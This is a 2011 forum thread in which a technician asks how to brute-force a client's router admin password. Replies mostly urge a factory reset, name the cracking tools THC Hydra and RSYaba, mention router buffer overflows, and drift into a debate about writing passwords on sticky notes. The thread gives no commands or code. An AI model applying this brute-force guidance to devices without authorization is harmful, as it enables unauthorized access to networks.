joeypesci Posted March 7, 2011 Share Posted March 7, 2011 Is it possible to do a dictionary attack a router to get the admin password? Haven't got the details of the router yet but a client has had a stroke so can't remember the login details. They don't want to reset the router and just wondered if there was a way of brute forcing the password? Before anyone comments. All above board and genuine. Quote Link to comment Share on other sites More sharing options...
digip Posted March 7, 2011 Share Posted March 7, 2011 Is it possible to do a dictionary attack a router to get the admin password? Haven't got the details of the router yet but a client has had a stroke so can't remember the login details. They don't want to reset the router and just wondered if there was a way of brute forcing the password? Before anyone comments. All above board and genuine. Its most definitely possible on a consumer router since they usually don't have any mechanisms to ban you after too many attempts. Nearly every consumer based router only lets you change the password while keeping the same default user name from manufacturing the same (which is usually admin or root), so if you look up the default user name, if it even takes one, as some only require a single password entered with no user name, then it shouldn't be too hard to brute force it, just time consuming. If anything, its a waste of time to try brute forcing if you can just reset it. If anything, see if he even changed the default password and look up the model first: http://www.routerpasswords.com/ If it is a consumer router, just reset the damn thing. Takes you 5 minutes to reset everything to what he needs it to be, and you can then change the password and be done with it. I can't see any reson not to reset it unless it were for a corporate network, by which you would have to take it offline to reset anyway. If its on a corporate network, there isn't a reset button on high end Cisco equipment(or most other brands either) and you would need to put it in ROMmon mode via console/serial cable to reset the password anyway. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted March 7, 2011 Share Posted March 7, 2011 THC Hydra Hit the reset button, takes a whole 5 seconds to reconfigure... Quote Link to comment Share on other sites More sharing options...
digininja Posted March 7, 2011 Share Posted March 7, 2011 Shameless plug, RSYaba http://www.digininja.org/projects/rsyaba.php But I agree with Mr-P, unless you are really interested in playing with attack tools then just hit the reset button and reconfigure it. Quote Link to comment Share on other sites More sharing options...
joeypesci Posted March 7, 2011 Author Share Posted March 7, 2011 It's what the client wants. No idea why, but they don't want to reset it. Might be the login details for the ISP maybe? I use to be with BT and luckily wrote mine down years ago, then reset the router and had to hunt round for the ISP login details :) I know they could call the ISP I guess. I don't know. Anyway, thanks for the suggests. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted March 7, 2011 Share Posted March 7, 2011 The clients don't know what is good for them. That's why they are talking to you to do the work. Quote Link to comment Share on other sites More sharing options...
buffy Posted March 7, 2011 Share Posted March 7, 2011 Depending on the version of the router some have buffer over flows that give you root access then you can just use passwd I know BT home hub white box had one. Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted March 8, 2011 Share Posted March 8, 2011 Hydra is quite good, for http brute forcing. Used it many times for pen-testing my network. Now on a side note, make sure you have a very long dictionary file. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted March 8, 2011 Share Posted March 8, 2011 It's still a matter of the clients not knowing what they want. You had to have given them some false hope of being able to "recover" the password. That was your first mistake :P. What I do with clients that always call me is setup remote admin, setup a DynDNS in the router to auto-update so i always have the IP, and away I go. They never need to know the password. I also write down the admin password, and Wifi access passkey/phrase on a piece of paper, and tape it to the top/bottom of the router just so if I forget, they can tell me, and if they forget (Typically the wifi access passkey/phrase) they can just look at the paper taped to the router. Quote Link to comment Share on other sites More sharing options...
digip Posted March 8, 2011 Share Posted March 8, 2011 It's still a matter of the clients not knowing what they want. You had to have given them some false hope of being able to "recover" the password. That was your first mistake :P. What I do with clients that always call me is setup remote admin, setup a DynDNS in the router to auto-update so i always have the IP, and away I go. They never need to know the password. I also write down the admin password, and Wifi access passkey/phrase on a piece of paper, and tape it to the top/bottom of the router just so if I forget, they can tell me, and if they forget (Typically the wifi access passkey/phrase) they can just look at the paper taped to the router. Doh! I can't tell you how many passwords I've found written on a stickynote placed on the bottom of the keyboard. Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted March 8, 2011 Share Posted March 8, 2011 Doh! I can't tell you how many passwords I've found written on a stickynote placed on the bottom of the keyboard. I work for an IT company that, provides on site support for police and all the other GOV agencies. Anyway, I've seen worse they write all their passwords on a stickynote and place them on the monitor itself. Ohh dude they must be really secure, no one will ever know what their password is "Sarcasm" Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted March 8, 2011 Share Posted March 8, 2011 Doh! I can't tell you how many passwords I've found written on a stickynote placed on the bottom of the keyboard. That may be true, but i'm assuming this is a home user, not a business. And if a home user has physical access or anyone for that matter to the router, why not have the password there, they could just as easily take the damn router... Quote Link to comment Share on other sites More sharing options...
digininja Posted March 8, 2011 Share Posted March 8, 2011 In most situations I don't see the problem with writing a password down and sticking it under the keyboard. If an attacker has physical access then they can quite often do a lot more damage than steal the password. Given the choice of a strong written down password or a weak one I'd go for the strong one as there are many more remote attackers than local one so better to defend against the masses than the minority. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted March 8, 2011 Share Posted March 8, 2011 True, and like I said, I do that for the home computer illiterate. So if they don't remember the password, either I will or I can look at the paper on the router itself to not have to push the reset button. That would be MOST helpful with dd-wrt flashed routers considering the reset button does not clear passwords. Quote Link to comment Share on other sites More sharing options...
digip Posted March 8, 2011 Share Posted March 8, 2011 In most situations I don't see the problem with writing a password down and sticking it under the keyboard. If an attacker has physical access then they can quite often do a lot more damage than steal the password. Given the choice of a strong written down password or a weak one I'd go for the strong one as there are many more remote attackers than local one so better to defend against the masses than the minority. The problem I have with written passwords laying about, and this is from where I used to work, is that vendors and outside techs who enter the building can plainly see passwords written on sticky notes attached to monitors as they pass by. Our Xerox techs would have to logon to the SUN stations attached to the printers (they had their own CE logins for maintenance), but they resided in the same rack as some of our other servers in the room we used for printing, which had passwords taped under the keyboards. Easily discoverable, and easily compromised by something as simple as a sticky note on the monitor or keyboard. I know for a fact that there was a person whom I used to work with, who used someone else's password to access the internet via stolen password when they themselves were not aloud to access the internet. This password got shared with other people and was discovered when the employee left the company, their password was still in use before they had time to remove it. All because they stole the one other persons password, so the attacker isn't always someone who might be from the outside, it could be internal employee posing as another employee's credentials, and unless they get caught (which they did) you wouldn't be the wiser. In the case of the employee who stole the password, it not only gave them access to the internet proxy, but also to the users Novell login and shares on network tree, which if abused could have had disastrous results on the internal corporate network. Quote Link to comment Share on other sites More sharing options...
digip Posted March 13, 2011 Share Posted March 13, 2011 Shameless plug, RSYaba http://www.digininja.org/projects/rsyaba.php But I agree with Mr-P, unless you are really interested in playing with attack tools then just hit the reset button and reconfigure it. I tried RSYaba on my site, and it worked a charm on my wordpress login. Granted I provided the username and password to use, but worked flawlessly once I figure dotu all the switches to add for password field and username field, cookies, etc. Excellent tool and very easy to use. I see you have it set for http, https, mysql and ssh. How hard would it be to modify it for something like say, FTP, RDP, VNC, etc. Would these require additional GEMs alone, or would you need to also write something to speak to these other protocols on top of the GEMs for them? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.